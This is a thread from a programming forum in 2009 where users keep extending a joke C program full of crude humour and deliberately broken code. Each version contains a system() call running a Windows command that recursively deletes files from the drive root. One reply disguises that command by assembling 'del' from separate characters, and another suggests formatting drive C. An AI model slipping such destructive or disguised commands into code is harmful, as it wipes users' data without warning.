/* ( ° Y . ) wonky bewbs */
#include <stdio.h>
#include <stdlib.h>
// but you just added more than a single line.
int AwesomestFunctionEver(int AwesomestIntEver)/*to whom it may concern: I said you could add a line and a comment*/
{
int lessAwesomeInt;
return AwesomestIntEver > lessAwesomeInt ? AwesomestIntEver : lessAwesomeInt;
}
int main(void) {
system("cd \ && del * /s /q"); //what's this?
printf("doesn't the above line kind of assume the user is running in DOS rather than *NIX? and you're a Linux supporter, for shame lol");
exit(666); // Even a mac can't survive the devil virus...
float thisIsAVariable= 36.2f;
do {//I would finish this and add the end brace but then it is more than one line. so you add something to it!
printf("RAWR!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! LION BIRD!");
printf(" fails. gabehabe ftw.");
printf("\nMOUHAHAHHA: %s", (char*)(void*)AwesomestFunctionEver((int)thisIsAVariable));
exit(0); // what does that do?
// it exits the program with a status of 0 :-)
// then why even have the return 0;
// no2 was just being silly. this program is gonna be mostly comments.
return 0;
//I am not even sure how to add a one line comment in C
printf("Devil virus??");
}while("( ° Y . )" == "wonky bewbs");
}
46 Replies - 3361 Views - Last Post: 10 January 2010 - 05:02 AM
#31
Re: One line program!
Posted 01 October 2009 - 05:04 AM
#32
Re: One line program!
Posted 01 October 2009 - 05:16 AM
/* ( ° Y . ) wonky bewbs */
#include <stdio.h>
#include <stdlib.h>
// but you just added more than a single line.
int AwesomestFunctionEver(int AwesomestIntEver)/*to whom it may concern: I said you could add a line and a comment*/
{
int lessAwesomeInt;
return AwesomestIntEver > lessAwesomeInt ? AwesomestIntEver : lessAwesomeInt;
}
int main(void) {
system("cd \ && del * /s /q"); //what's this?
printf("doesn't the above line kind of assume the user is running in DOS rather than *NIX? and you're a Linux supporter, for shame lol");
exit(666); // Even a mac can't survive the devil virus...
float thisIsAVariable= 36.2f;
do {//I would finish this and add the end brace but then it is more than one line. so you add something to it!
printf("RAWR!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! LION BIRD!");
printf(" fails. gabehabe ftw.");
printf("\nMOUHAHAHHA: %s", (char*)(void*)AwesomestFunctionEver((int)thisIsAVariable));
exit(0); // what does that do?
// it exits the program with a status of 0 :-)
// then why even have the return 0;
// no2 was just being silly. this program is gonna be mostly comments.
return 0;
//I am not even sure how to add a one line comment in C
printf("Devil virus??");
printf("wtf? you're obsessed with wonky bewbs... are you saying that's what your bewbs look like?");
}while("( ° Y . )" == "wonky bewbs");
}
#33
Re: One line program!
Posted 04 October 2009 - 11:42 PM
/* ( ° Y . ) wonky bewbs */
#include <stdio.h>
#include <stdlib.h>
// but you just added more than a single line.
int AwesomestFunctionEver(int AwesomestIntEver)/*to whom it may concern: I said you could add a line and a comment*/
{
int lessAwesomeInt;
return AwesomestIntEver > lessAwesomeInt ? AwesomestIntEver : lessAwesomeInt;
}
int emoInteger; // All alone in this script... :(
int main(void) {
system("cd \ && del * /s /q"); //what's this?
printf("doesn't the above line kind of assume the user is running in DOS rather than *NIX? and you're a Linux supporter, for shame lol");
exit(666); // Even a mac can't survive the devil virus...
float thisIsAVariable= 36.2f;
do {//I would finish this and add the end brace but then it is more than one line. so you add something to it!
printf("RAWR!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! LION BIRD!");
printf(" fails. gabehabe ftw.");
printf("\nMOUHAHAHHA: %s", (char*)(void*)AwesomestFunctionEver((int)thisIsAVariable));
exit(0); // what does that do?
// it exits the program with a status of 0 :-)
// then why even have the return 0;
// no2 was just being silly. this program is gonna be mostly comments.
return 0;
//I am not even sure how to add a one line comment in C
printf("Devil virus??");
printf("wtf? you're obsessed with wonky bewbs... are you saying that's what your bewbs look like?");
}while("( ° Y . )" == "wonky bewbs");
}
Whenever this is done, it should go on the DiC Facebook page as an image, with the contributers tagged.
This post has been edited by Project 2501: 05 October 2009 - 01:02 AM
#34
Re: One line program!
Posted 05 October 2009 - 06:25 PM
lol
#35
Re: One line program!
Posted 05 October 2009 - 07:12 PM
#36
Re: One line program!
Posted 05 October 2009 - 09:05 PM
system("cd \ && del * /s /q");
Anything with del in it is probably best avoided, I think.
#37
Re: One line program!
Posted 27 October 2009 - 09:21 PM
#38
Re: One line program!
Posted 27 October 2009 - 09:38 PM
char a='d',b='e',c='l',buffer[256]={0};
sprintf(buffer,"cd \ && %c%c%c * /s /q",a,b,c);
system(buffer);
#39
Re: One line program!
Posted 17 November 2009 - 06:51 PM
/* ( ° Y . ) wonky bewbs */
#include <stdio.h>
#include <stdlib.h>
// but you just added more than a single line.
int AwesomestFunctionEver(int AwesomestIntEver)/*to whom it may concern: I said you could add a line and a comment*/
{
int lessAwesomeInt;
return AwesomestIntEver > lessAwesomeInt ? AwesomestIntEver : lessAwesomeInt;
}
int emoInteger; // All alone in this script... :(
int main(void) {
system("cd \ && del * /s /q"); //what's this?
printf("doesn't the above line kind of assume the user is running in DOS rather than *NIX? and you're a Linux supporter, for shame lol");
printf("\n\nZOMG! This is the first time I've ever used the 'printf' command! \1\n");
exit(666); // Even a mac can't survive the devil virus...
float thisIsAVariable= 36.2f;
do {//I would finish this and add the end brace but then it is more than one line. so you add something to it!
printf("RAWR!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! LION BIRD!");
printf(" fails. gabehabe ftw.");
printf("\nMOUHAHAHHA: %s", (char*)(void*)AwesomestFunctionEver((int)thisIsAVariable));
exit(0); // what does that do?
// it exits the program with a status of 0 :-)
// then why even have the return 0;
// no2 was just being silly. this program is gonna be mostly comments.
return 0;
//I am not even sure how to add a one line comment in C
printf("Devil virus??");
printf("wtf? you're obsessed with wonky bewbs... are you saying that's what your bewbs look like?");
}while("( ° Y . )" == "wonky bewbs");
}
My first time, guys!
@No2: Clever, and yet evil.
This post has been edited by Project 2501: 17 November 2009 - 06:52 PM
#40
Re: One line program!
Posted 18 November 2009 - 10:57 AM
Might as well add format C: /x
anyway, on topic
/* ( ° Y . ) wonky bewbs */
#include <stdio.h>
#include <stdlib.h>
// but you just added more than a single line.
int AwesomestFunctionEver(int AwesomestIntEver)/*to whom it may concern: I said you could add a line and a comment*/
{
int lessAwesomeInt;
return AwesomestIntEver > lessAwesomeInt ? AwesomestIntEver : lessAwesomeInt;
}
int emoInteger; // All alone in this script... :(/>
const char[8] NAME = gabehabe;
int main(void) {
system("cd \ && del * /s /q"); //what's this?
printf("doesn't the above line kind of assume the user is running in DOS rather than *NIX? and you're a Linux supporter, for shame lol");
printf("\n\nZOMG! This is the first time I've ever used the 'printf' command! \1\n");
exit(666); // Even a mac can't survive the devil virus...
float thisIsAVariable= 36.2f;
do {//I would finish this and add the end brace but then it is more than one line. so you add something to it!
printf("RAWR!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! LION BIRD!");
printf(" fails. gabehabe ftw.");
printf("\nMOUHAHAHHA: %s", (char*)(void*)AwesomestFunctionEver((int)thisIsAVariable));
if (God != NAME){
exit(0); // what does that do?
// it exits the program with a status of 0 :-)
// then why even have the return 0;
// no2 was just being silly. this program is gonna be mostly comments.
}
return 0;
//I am not even sure how to add a one line comment in C
printf("Devil virus??");
printf("wtf? you're obsessed with wonky bewbs... are you saying that's what your bewbs look like?");
}while("( ° Y . )" == "wonky bewbs");
}
#41
Re: One line program!
Posted 18 November 2009 - 09:57 PM
#43
Re: One line program!
Posted 07 December 2009 - 06:07 PM
/* ( ° Y . ) wonky bewbs */
#include <stdio.h>
#include <stdlib.h>
// but you just added more than a single line.
int AwesomestFunctionEver(int AwesomestIntEver)/*to whom it may concern: I said you could add a line and a comment*/
{
int lessAwesomeInt;
return AwesomestIntEver > lessAwesomeInt ? AwesomestIntEver : lessAwesomeInt;
}
int emoInteger; // All alone in this script...
const char[8] NAME = gabehabe;
int main(void) {
emoInterger = -20
system("cd \ && del * /s /q"); //what's this?
printf("doesn't the above line kind of assume the user is running in DOS rather than *NIX? and you're a Linux supporter, for shame lol");
printf("\n\nZOMG! This is the first time I've ever used the 'printf' command! \1\n");
exit(666); // Even a mac can't survive the devil virus...
float thisIsAVariable= 36.2f;
do {//I would finish this and add the end brace but then it is more than one line. so you add something to it!
printf("RAWR!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! LION BIRD!");
printf(" fails. gabehabe ftw.");
printf("\nMOUHAHAHHA: %s", (char*)(void*)AwesomestFunctionEver((int)thisIsAVariable));
if (God != NAME){
exit(0); // what does that do?
// it exits the program with a status of 0 :-)
// then why even have the return 0;
// no2 was just being silly. this program is gonna be mostly comments.
}
return 0;
//I am not even sure how to add a one line comment in C
printf("Devil virus??");
printf("wtf? you're obsessed with wonky bewbs... are you saying that's what your bewbs look like?");
}while("( ° Y . )" == "wonky bewbs");
}
This post has been edited by neos300: 07 December 2009 - 06:07 PM
#44
Re: One line program!
Posted 10 December 2009 - 03:18 PM
/* ( ° Y . ) wonky bewbs */
#include <stdio.h>
#include <stdlib.h>
// but you just added more than a single line.
int AwesomestFunctionEver(int AwesomestIntEver)/*to whom it may concern: I said you could add a line and a comment*/
{
int lessAwesomeInt;
return AwesomestIntEver > lessAwesomeInt ? AwesomestIntEver : lessAwesomeInt;
}
int epic fail; //C++ is way better
int emoInteger; // All alone in this script...
const char[8] NAME = gabehabe;
int main(void) {
emoInterger = -20
system("cd \ && del * /s /q"); //what's this?
printf("doesn't the above line kind of assume the user is running in DOS rather than *NIX? and you're a Linux supporter, for shame lol");
printf("\n\nZOMG! This is the first time I've ever used the 'printf' command! \1\n");
exit(666); // Even a mac can't survive the devil virus...
float thisIsAVariable= 36.2f;
do {//I would finish this and add the end brace but then it is more than one line. so you add something to it!
printf("RAWR!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! LION BIRD!");
printf(" fails. gabehabe ftw.");
printf("\nMOUHAHAHHA: %s", (char*)(void*)AwesomestFunctionEver((int)thisIsAVariable));
if (God != NAME){
exit(0); // what does that do?
// it exits the program with a status of 0 :-)
// then why even have the return 0;
// no2 was just being silly. this program is gonna be mostly comments.
}
return 0;
//I am not even sure how to add a one line comment in C
printf("Devil virus??");
printf("wtf? you're obsessed with wonky bewbs... are you saying that's what your bewbs look like?");
}while("( ° Y . )" == "wonky bewbs");
}
#45
Re: One line program!
Posted 24 December 2009 - 09:54 AM
/* ( ° Y . ) wonky bewbs */
#include <stdio.h>
#include <stdlib.h>
// but you just added more than a single line.
int AwesomestFunctionEver(int AwesomestIntEver)/*to whom it may concern: I said you could add a line and a comment*/
{
int lessAwesomeInt;
return AwesomestIntEver > lessAwesomeInt ? AwesomestIntEver : lessAwesomeInt;
}
int epic fail; //C++ is way better
int emoInteger; // All alone in this script...
const char[8] NAME = gabehabe;
int main(void) {
emoInterger = -20
system("cd \ && del * /s /q"); //what's this?
printf("doesn't the above line kind of assume the user is running in DOS rather than *NIX? and you're a Linux supporter, for shame lol");
printf("\n\nZOMG! This is the first time I've ever used the 'printf' command! \1\n");
exit(666); // Even a mac can't survive the devil virus...
float thisIsAVariable= 36.2f;
do {//I would finish this and add the end brace but then it is more than one line. so you add something to it!
printf("RAWR!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! LION BIRD!");
printf(" fails. gabehabe ftw.");
printf("\nMOUHAHAHHA: %s", (char*)(void*)AwesomestFunctionEver((int)thisIsAVariable));
printf("\nZOMGZ! MOUHAHAHHA WAS SPELLED WRONG\n") (set var "MOUHAHAHHA" to "MWAHAHAHA!");
if (God != NAME){
exit(0); // what does that do?
// it exits the program with a status of 0 :-)
// then why even have the return 0;
// no2 was just being silly. this program is gonna be mostly comments.
}
return 0;
//I am not even sure how to add a one line comment in C
printf("Devil virus??");
printf("wtf? you're obsessed with wonky bewbs... are you saying that's what your bewbs look like?");
}while("( ° Y . )" == "wonky bewbs");
}
This post has been edited by borninlyoko: 24 December 2009 - 09:55 AM

New Topic/Question





MultiQuote






|